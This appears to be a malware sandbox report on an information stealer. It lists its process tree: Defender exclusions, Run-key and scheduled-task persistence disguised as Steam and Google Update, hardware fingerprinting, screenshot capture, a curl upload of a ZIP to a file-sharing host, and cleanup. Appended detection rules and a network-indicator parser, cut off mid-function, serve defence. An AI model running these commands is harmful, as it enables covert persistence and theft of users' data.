powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tqr0iaas\tqr0iaas.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES93B4.tmp" "c:\Users\Admin\AppData\Local\Temp\tqr0iaas\CSC4E6C8135414A4B0683AD5297B3316BA.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Ngomewng.zip";"

C:\Windows\system32\curl.exe

curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Ngomewng.zip";

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
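As an added example, not part of the sandbox report: detection logic that encodes the chain visible in the process tree above (hardware fingerprinting through wmic and getmac, external IP lookup, Run-key and Startup-folder persistence, PowerShell with -ExecutionPolicy Bypass, the curl multipart upload, and the final rmdir of the staging directory). The sample records are constructed from the command lines on this page; the two-field (image, command line) record shape stands in for Sysmon Event ID 1 or Security 4688 fields and, like the rule labels and stage names, is an assumption. Two points the listing supports but does not spell out: every child is launched as `cmd.exe /d /s /c "..."`, which is the wrapper Node.js `child_process.exec` uses on Windows and, together with the `node_sqlite3.node` addon unpacked under `Temp\pkg\` in the Files section, is consistent with a Node program packaged with pkg; and the Startup-folder download still carries the builder's literal `YOUR-BINDED-EXE-LINK-HERE`, so that fetch cannot have succeeded in this build even though the rule rightly fires on it.

```python
import re

# Constructed sample of process-creation records as (image, command line).
# The command lines are copied from this report's process tree; the two-field
# record shape stands in for Sysmon Event ID 1 / Security 4688 fields and is an
# assumption. The last record is a benign control that must not fire.
SAMPLE_EVENTS = [
    (r"C:\Windows\system32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"'),
    (r"C:\Windows\system32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"'),
    (r"C:\Windows\system32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""'),
    (r"C:\Windows\system32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"'),
    (r"C:\Windows\system32\reg.exe",
     r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe" /f'),
    (r"C:\Windows\system32\curl.exe",
     r'curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE'),
    (r"C:\Windows\system32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"'),
    (r"C:\Windows\system32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""'),
    (r"C:\Windows\system32\curl.exe",
     r'curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Ngomewng.zip";'),
    (r"C:\Windows\system32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""'),
    (r"C:\Windows\System32\Wbem\WMIC.exe", "wmic os get caption"),
]

# (ATT&CK technique, label, pattern over the full command line)
RULES = [
    ("T1082", "hardware fingerprint via wmic",
     re.compile(r"\bwmic\b.*\b(bios\s+get\s+smbiosbiosversion|MemoryChip\s+get|win32_VideoController)\b", re.I)),
    ("T1016", "MAC address enumeration via getmac", re.compile(r"\bgetmac\b", re.I)),
    ("T1016.001", "external IP lookup via curl", re.compile(r"\bcurl\b.*\bapi\.ipify\.org\b", re.I)),
    ("T1547.001", "Run key written with reg.exe",
     re.compile(r"\breg\s+add\s+HK(CU|LM)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b", re.I)),
    ("T1547.001", "download written straight into the Startup folder",
     re.compile(r'\bcurl\b.*\s-o\s+"?[^"]*\\Start Menu\\Programs\\Startup\\', re.I)),
    ("T1059.001", "PowerShell script run with -ExecutionPolicy Bypass",
     re.compile(r"\bpowershell\b.*-ExecutionPolicy\s+Bypass\b", re.I)),
    ("T1567.002", "multipart upload of a ZIP archive with curl",
     re.compile(r'\bcurl\b.*--request\s+POST\b.*--form\s+"?file=@[^"]*\.zip', re.I)),
    ("T1070.004", "staging directory wiped with rmdir /s /q", re.compile(r"\brmdir\s+/s\s+/q\b", re.I)),
]

# cmd.exe /d /s /c "<command>" is the wrapper Node.js child_process.exec uses on
# Windows; a burst of them from one parent points at a Node binary driving the
# shell (consistent with the node_sqlite3.node addon unpacked under Temp\pkg\).
NODE_EXEC = re.compile(r'cmd\.exe\s+/d\s+/s\s+/c\s+"', re.I)


def match_rules(cmdline):
    """Return (technique, label) for every rule whose pattern hits cmdline."""
    return [(tid, label) for tid, label, pat in RULES if pat.search(cmdline)]


def node_exec_launches(events):
    """Count command lines that carry the Node.js exec wrapper."""
    return sum(1 for _, cmdline in events if NODE_EXEC.search(cmdline))


def triage(events):
    """Aggregate rule hits over a batch of records and derive a verdict."""
    hits = [{"image": img, "technique": tid, "label": label, "cmdline": cmd}
            for img, cmd in events for tid, label in match_rules(cmd)]
    techniques = {h["technique"] for h in hits}
    stages = {
        "discovery": bool(techniques & {"T1082", "T1016", "T1016.001"}),
        "persistence": "T1547.001" in techniques,
        "execution": "T1059.001" in techniques,
        "exfiltration": "T1567.002" in techniques,
        "cleanup": "T1070.004" in techniques,
    }
    # wmic, reg add and curl all have legitimate uses, so any single stage is
    # context only; discovery + persistence + exfiltration together is the chain.
    chain = stages["discovery"] and stages["persistence"] and stages["exfiltration"]
    return {"hits": hits, "techniques": sorted(techniques), "stages": stages,
            "verdict": "stealer chain" if chain else "inconclusive"}


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for h in result["hits"]:
        print(f'{h["technique"]:<10} {h["label"]:<52} {h["cmdline"][:60]}')
    print("verdict:", result["verdict"], "| Node exec wrappers:", node_exec_launches(SAMPLE_EVENTS))
```

Run it as-is for a printed hit table; in production, feed it the command-line field of your EDR's process-creation events grouped by parent process, alert on `verdict`, and keep the single-technique hits as context rather than as alerts of their own.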

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:49851 tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:80 tcp
N/A 224.0.0.251:5353 udp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
DE 49.13.193.134:443 api.filedoge.com tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:49966 tcp
US 104.26.13.205:80 api.ipify.org tcp
US 34.117.118.44:443 www.myexternalip.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 172.67.205.179:443 mrbfederali.cam tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:49989 tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50006 tcp
N/A 127.0.0.1:50026 tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50046 tcp
N/A 127.0.0.1:50092 tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50130 tcp
N/A 127.0.0.1:50150 tcp
N/A 127.0.0.1:50176 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:50207 tcp
N/A 127.0.0.1:50227 tcp
N/A 127.0.0.1:50247 tcp
N/A 127.0.0.1:50267 tcp
GB 184.28.176.19:443 tcp
US 13.89.178.27:443 browser.pipe.aria.microsoft.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
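As an added example, not part of the report: turning the flattened Network table above into a reviewed indicator list. It parses the report's own "Country Destination Domain Proto" rows (including the row with no resolved name, which has one column fewer), drops loopback, multicast, resolver and OS-telemetry traffic, groups what is left by hostname or bare IP with ports and hit counts, and tags the services commodity stealers lean on (the two external-IP lookup sites, the file-sharing upload endpoint, the Telegram Bot API, the GitHub download). The rows are a subset copied from the table; the noise allow-list and the tag strings are assumptions to be tuned to your own baseline.

```python
import ipaddress

# Constructed sample: a subset of rows from the Network table above, kept in
# the report's own "Country Destination Domain Proto" layout. A flow with no
# resolved name (the 184.28.176.19 row) has only three columns.
SAMPLE_ROWS = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:49851 tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 224.0.0.251:5353 udp
DE 49.13.193.134:443 api.filedoge.com tcp
US 34.117.118.44:443 www.myexternalip.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 172.67.205.179:443 mrbfederali.cam tcp
GB 184.28.176.19:443 tcp
US 13.89.178.27:443 browser.pipe.aria.microsoft.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
"""

# Assumed baseline of sandbox/OS background traffic; tune to your own images.
NOISE_SUFFIXES = ("bing.com", "microsoft.com")
RESOLVERS = {"8.8.8.8"}

# Services commodity stealers lean on, keyed to the ATT&CK technique.
SERVICE_TAGS = {
    "api.ipify.org": "T1016.001 external IP lookup",
    "www.myexternalip.com": "T1016.001 external IP lookup",
    "api.filedoge.com": "T1567.002 upload to a file-sharing service",
    "api.telegram.org": "T1102 Telegram Bot API as C2/exfil channel",
    "github.com": "T1105 payload download from GitHub",
    "objects.githubusercontent.com": "T1105 payload download from GitHub",
}


def parse_rows(text):
    """Parse the flattened table; tolerate the missing-domain column."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = ""
        else:
            continue
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def is_noise(row):
    """Loopback/multicast/private traffic, DNS to the resolver, OS telemetry."""
    addr = ipaddress.ip_address(row["ip"])
    if addr.is_loopback or addr.is_multicast or addr.is_private or addr.is_link_local:
        return True
    if row["ip"] in RESOLVERS:
        return True
    dom = row["domain"]
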